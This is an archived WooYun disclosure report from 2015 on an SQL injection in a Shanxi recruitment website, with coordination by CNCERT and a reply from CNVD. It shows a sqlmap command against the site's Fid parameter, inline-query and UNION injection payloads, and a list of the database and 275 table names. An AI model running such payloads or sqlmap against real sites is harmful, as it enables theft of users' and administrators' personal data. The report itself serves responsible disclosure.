漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0156151
漏洞标题:山西人才网某处SQL注入,泄露全站数据(用户,公司,管理员....)
相关厂商:山西人才网
漏洞作者: 逆流冰河
提交时间:2015-11-28 00:16
修复时间:2016-01-16 16:34
公开时间:2016-01-16 16:34
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-28: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开
简要描述:
如题
详细说明:
1,注入点:
sqlmap -u "http://**.**.**.**:81/company/ShowJobs.aspx?Fid=107978&ZwId=167260" --batch
Parameter: Fid (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: Fid=(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5223=5223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(118)+CHAR(113))&ZwId=167260
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: Fid=107978 UNION ALL SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(80)+CHAR(113)+CHAR(68)+CHAR(120)+CHAR(83)+CHAR(66)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(118)+CHAR(113)-- &ZwId=167260
2,数据库信息
available databases [7]:
[*] Db_NewSjrc
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
3,Db_NewSjrc好多表,我不做坏事
Database: Db_NewSjrc
[275 tables]
+-----------------------------+
| C_FZ_Info |
| C_GaojiCompany_Info |
| C_GaojiCompany_yp |
| C_GaojiCompany_zw |
| C_GaojiPerson_Old |
| C_GaojiPerson_Old |
| C_LiuDongDY |
| C_Message |
| C_PaiQian_Basic |
| C_PaiQian_Company |
| C_PaiQian_User |
| C_XianChang_Changci |
| C_XianChang_Company_GuiZhou |
| C_XianChang_Company_GuiZhou |
| C_XianChang_Tel |
| C_XianChang_ZW |
| InputData |
| Sheet1$ |
| T_AdManage_BANNER |
| T_AdManage_BANNER |
| T_AdManage_HYDW |
| T_AdManage_LOGO |
| T_AdManage_SlZp1 |
| T_AdManage_SlZp1 |
| T_AdManage_SlZs |
| T_AdManage_school |
| T_Admanage_Couplet |
| T_Dc_wyb |
| T_Fz_Company_jobs |
| T_Fz_Company_jobs |
| T_Fz_News |
| T_Fz_User |
| T_SiteSMS_Auto |
| T_SiteSMS_Class |
| T_SiteSMS_Cont |
| T_bumeng_admin |
| T_bumeng_count |
| T_bumeng_type |
| T_cj_Company |
| T_cj_job |
| T_cj_key |
| T_count |
| T_da_admin |
| T_da_count |
| T_da_type |
| T_dc_personjy |
| T_dc_personjy |
| T_guzhu |
| Temp_Person |
| Temp_QHIT |
| V_Company |
| V_DFJH_CB20 |
| V_DFJH_CB21 |
| V_DFJH_CB33 |
| V_person |
| View_net_DiaoCTJ |
| XianChang_Company |
| XianChang_Log |
| c_DaiLi_File |
| c_DaiLi_Hk |
| c_DaiLi_Zc |
| c_DaiLi_worker |
| c_DaiLi_worker |
| c_DaiLi_working |
| c_Down |
| c_News |
| c_Service |
| c_dangan |
| deletedCompany |
| deletedjobs |
| deletednews |
| deletedres |
| dtproperties |
| sys_Applications |
| sys_Event |
| sys_Field |
| sys_FieldValue |
| sys_Group |
| sys_Module |
| sys_Online |
| sys_RoleApplication |
| sys_RolePermission |
| sys_Roles |
| sys_SystemInfo |
| sys_User |
| sys_UserRoles |
| sysdiagrams |
| t_AdManage_MqZq |
| t_AdManage_qg1 |
| t_AdManage_qg1 |
| t_BumenAd_Class |
| t_BumenAd_Cont |
| t_BumenAd_count |
| t_PeixunAd_Class |
| t_PeixunAd_Cont |
| t_PeixunAd_Count |
| t_Peixun_School |
| t_Peixun_class |
| t_Peixun_person |
| t_all_trade |
| t_baom1 |
| t_baom1 |
| t_base_City |
| t_base_CompanyMemberType |
| t_base_CompanyType |
| t_base_Computer |
| t_base_Degree |
| t_base_Exuberance |
| t_base_Folk |
| t_base_GongGao |
| t_base_JobStatus |
| t_base_Jobs |
| t_base_LanLevel |
| t_base_Languages |
| t_base_Marriage |
| t_base_PeiXunType |
| t_base_PersonUserType |
| t_base_Political |
| t_base_RcType |
| t_base_Sex |
| t_base_Sheng |
| t_base_SpecialDaLei |
| t_base_SpecialXiaoLei |
| t_base_TechTitle |
| t_base_Trade |
| t_base_WorkYear |
| t_base_ZwDaLei |
| t_base_ZwXiaoLei |
| t_base_area |
| t_base_companygm |
| t_base_pay |
| t_base_rseumeCount |
| t_base_word |
| t_base_yx |
| t_base_yyky |
| t_chuangye |
| t_com_look |
| t_com_rz |
| t_company_LoGo |
| t_company_Mstz |
| t_company_PreComment |
| t_company_advise |
| t_company_basic_month12 |
| t_company_basic_month12 |
| t_company_basic_month12 |
| t_company_basic_month3 |
| t_company_basic_month6 |
| t_company_bm |
| t_company_bmzh |
| t_company_faccess |
| t_company_fee |
| t_company_rck |
| t_company_rseume |
| t_company_seacher |
| t_company_user_month12 |
| t_company_user_month12 |
| t_company_user_month12 |
| t_company_user_month3 |
| t_company_user_month6 |
| t_company_zw_month12 |
| t_company_zw_month12 |
| t_company_zw_month12 |
| t_company_zw_month3 |
| t_company_zw_month6 |
| t_dc_225 |
| t_dc_410 |
| t_dc_jx |
| t_diaoc |
| t_head_company |
| t_head_save |
| t_head_user |
| t_investigate_basic |
| t_investigate_cont |
| t_investigate_result |
| t_investigate_user_basic |
| t_investigate_user_info |
| t_investigate_user_input |
| t_jiaozhu |
| t_mgr_baseInfo |
| t_mgr_channel |
| t_mgr_column |
| t_mgr_css |
| t_mgr_template |
| t_money_basic |
| t_news_article |
| t_news_type |
| t_page_power |
| t_peixun_neixun |
| t_peixun_news |
| t_peixun_teacher |
| t_person_InviteMe |
| t_person_Mstz |
| t_person_Train |
| t_person_Work |
| t_person_basic_month12 |
| t_person_basic_month12 |
| t_person_basic_month12 |
| t_person_basic_month3 |
| t_person_basic_month6 |
| t_person_certificate |
| t_person_collection |
| t_person_corr |
| t_person_jobs_month12 |
| t_person_jobs_month12 |
| t_person_jobs_month12 |
| t_person_jobs_month3 |
| t_person_jobs_month6 |
| t_person_jxhd |
| t_person_jxqt |
| t_person_moban |
| t_person_mszj |
| t_person_new |
| t_person_seach |
| t_person_send |
| t_person_user_month12 |
| t_person_user_month12 |
| t_person_user_month12 |
| t_person_user_month3 |
| t_person_user_month6 |
| t_person_workyear |
| t_sitesms_rz |
| t_sj_message |
| t_sj_rz |
| t_sx_ls1301 |
| t_sx_ls1301 |
| t_sx_ls1302 |
| t_sx_ls1303 |
| t_sx_ls1401 |
| t_sx_ls2 |
| t_sx_ls3 |
| t_sx_ls5 |
| t_sx_ls6 |
| t_sx_ls7 |
| t_sx_ls8 |
| t_sx_zph8 |
| t_sx_zph8 |
| t_sxjs_fb |
| t_sxjs_fb |
| t_sys_AutoGet |
| t_sys_IntegralRs |
| t_sys_SqlIn |
| t_sys_ZtCompany |
| t_sys_argu |
| t_sys_bbs |
| t_sys_enum |
| t_sys_func |
| t_sys_html2 |
| t_sys_html2 |
| t_sys_link |
| t_sys_log |
| t_sys_power |
| t_sys_rpt |
| t_sys_siteFunc |
| t_sys_userAndUserGroup |
| t_sys_userAndUserGroup |
| t_sys_userGroup |
| t_sys_zhuanti |
| t_urlLinks_Type |
| t_urlLinks_cont |
| t_video_Class |
| t_video_Cont |
| t_video_fee |
| t_waichu |
| t_weixin_type |
| t_weixin_type |
| t_zkz_rs |
| t_zkz_rs |
| t_zph_user |
| t_zph_user |
| t_zph_yy |
| t_zphxx |
| tempCompanyInfo |
| view_net_LanMGL |
| view_net_LanMJG |
| xinxibiao |
+-----------------------------+
4,里面有个liudongDY,要做怀疑已经被黑客利用了
漏洞证明:
如上
修复方案:
Fix
版权声明:转载请注明来源 逆流冰河@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-12-02 16:32
厂商回复:
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给山西分中心,由山西分中心后续协调网站管理单位处置。
最新状态:
暂无